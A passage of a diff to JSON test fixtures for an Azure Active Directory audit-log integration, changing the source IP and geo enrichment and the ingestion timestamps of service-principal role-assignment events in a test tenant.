APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125335600Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -18073,25 +16507,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -18105,7 +16521,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -18241,7 +16657,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -18253,12 +16669,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036555500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125342100Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -18284,25 +16700,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -18316,7 +16714,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -18452,7 +16850,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -18464,12 +16862,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036560400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8